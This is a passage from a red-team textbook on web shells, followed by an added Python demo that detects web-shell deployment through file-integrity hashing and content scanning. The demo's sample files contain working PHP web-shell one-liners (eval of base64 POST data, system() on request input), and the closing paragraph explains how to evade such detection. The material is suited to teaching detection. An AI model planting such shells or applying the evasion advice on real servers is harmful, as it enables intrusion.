1 Joe Vest, James Tubberville Red Team Development and Operations
Web Shell Examples

● China Chopper – A small web shell packed with features. It has several command and control features, including a password brute-force capability.
● WSO – Stands for "web shell by orb" and has the ability to masquerade as an error page containing a hidden login form.
● C99 – A version of the WSO shell with additional functionality. It can display the server's security measures and contains a self-delete function.
● B374K – A PHP-based web shell with common functionality such as viewing processes and executing commands.

Why would a threat use a web shell?

Remote code execution flaws are rare, which has forced heavy reliance on client-side exploitation; however, web applications are still very valuable doors into a network, and directly compromising a network by remote means gives a threat many options. Web applications are commonly overlooked, misconfigured, and riddled with flaws. Executing operating system commands with an on-demand tool is a perfect Long Haul solution and, therefore, a perfect target for a Red Team.

A Red Team must be aware of the common IOCs generated by the deployment of a web shell:

● The exploitation of a web application flaw must occur. The server attack surface is limited to file upload flaws, RFI flaws, or other application security flaws. This can trigger an alert depending on the type of exploitation or flaw.
● Web server files will be added or modified. Either a new file is written to the web root or an application's existing source code is modified directly. Integrity monitoring may alert defenders to these changes.

Although the vulnerabilities required for web shell deployment comprise a small subset of application security, those paths are worth pursuing as a threat. Web shells are great tools but do have limits. Operating system commands executed on the target server run in the context of the web service user. If a target has followed best security practices, that service will be running as a non-privileged account.
This may seriously limit a web shell’s capability. An operator may need additional credentials or further exploitation to issue commands with the proper permissions. Even in the case of limited use, web shells can often still be used as pivot points. Other limitations depend on the web server’s communication with other target systems. Web shells may have limited access to internal servers. Web servers in a DMZ or external location may require pivoting through multiple servers to communicate with internal target systems. In any engagement, the maintenance of a solid toolset that includes web shells allows a Red Team to be flexible, which increases its capability.
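The two IOCs above (files added or modified under the web root, and shell-like content appearing in them) are exactly what a defender's file-integrity monitoring and content scanning catch. The following Python script is an added example, not code from the book or any of the shells it lists: it baselines a constructed web root with SHA-256 hashes, simulates a hypothetical deployment that drops a new shell file and backdoors an existing include, and then reports both the integrity diff and a content scan. The sample PHP files, indicator patterns and the two-indicator threshold are all assumptions made for this illustration.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Constructed sample web root (not from the book): a clean baseline, then the
# same tree after a hypothetical attacker drops a shell and backdoors a file.
BASELINE_FILES = {
    "index.php": "<?php echo 'Hello'; ?>\n",
    "includes/config.php": "<?php $db = 'app'; ?>\n",
}
COMPROMISED_FILES = {
    "index.php": "<?php echo 'Hello'; ?>\n",
    "includes/config.php": "<?php $db = 'app'; @eval(base64_decode($_POST['c'])); ?>\n",
    "uploads/img.php": "<?php if (isset($_REQUEST['cmd'])) { system($_REQUEST['cmd']); } ?>\n",
}

# Content indicators commonly seen in PHP web shells (assumed set). Any one
# alone is noisy (legitimate code reads $_POST), so a file is flagged only
# when several distinct indicators co-occur.
SHELL_INDICATORS = {
    "eval": re.compile(rb"\beval\s*\("),
    "os_exec": re.compile(rb"\b(system|passthru|shell_exec|exec|popen|proc_open)\s*\("),
    "decode": re.compile(rb"\bbase64_decode\s*\("),
    "request_input": re.compile(rb"\$_(GET|POST|REQUEST|COOKIE)\s*\["),
}


def write_tree(root: Path, files: dict) -> None:
    """Materialise a dict of relative path -> contents under root (overwrites)."""
    for rel, body in files.items():
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(body)


def hash_tree(root: Path) -> dict:
    """SHA-256 of every file under root, keyed by POSIX-style relative path."""
    return {
        p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(root.rglob("*")) if p.is_file()
    }


def integrity_diff(baseline: dict, current: dict) -> dict:
    """Compare two hash snapshots; this is what file-integrity monitoring alerts on."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(k for k in baseline if k in current and baseline[k] != current[k]),
    }


def scan_file(path: Path) -> list:
    """Names of the indicators present in one file, in SHELL_INDICATORS order."""
    data = path.read_bytes()
    return [name for name, rx in SHELL_INDICATORS.items() if rx.search(data)]


def scan_tree(root: Path, min_indicators: int = 2) -> dict:
    """Flag PHP files where at least min_indicators distinct indicators co-occur."""
    hits = {}
    for p in sorted(root.rglob("*.php")):
        found = scan_file(p)
        if len(found) >= min_indicators:
            hits[p.relative_to(root).as_posix()] = found
    return hits


def demo() -> dict:
    """Baseline a clean web root, simulate the shell deployment, report both IOCs."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        write_tree(root, BASELINE_FILES)
        baseline = hash_tree(root)
        write_tree(root, COMPROMISED_FILES)  # the deployment event
        return {
            "integrity": integrity_diff(baseline, hash_tree(root)),
            "content": scan_tree(root),
        }


if __name__ == "__main__":
    result = demo()
    for kind, paths in result["integrity"].items():
        print(f"{kind}: {paths}")
    for path, found in result["content"].items():
        print(f"flagged {path}: {', '.join(found)}")
```

Run it directly and the integrity diff lists uploads/img.php as added and includes/config.php as modified, while the content scan flags both files and leaves index.php alone. From the Red Team side this shows why a shell appended to an existing, frequently changing file is quieter against hash-based monitoring than a brand-new file in an upload directory, and why a shell that avoids the obvious eval/system/base64 combination survives a naive content scan; from the defender's side, it shows that hashing the web root is only useful when the baseline was taken before the deployment.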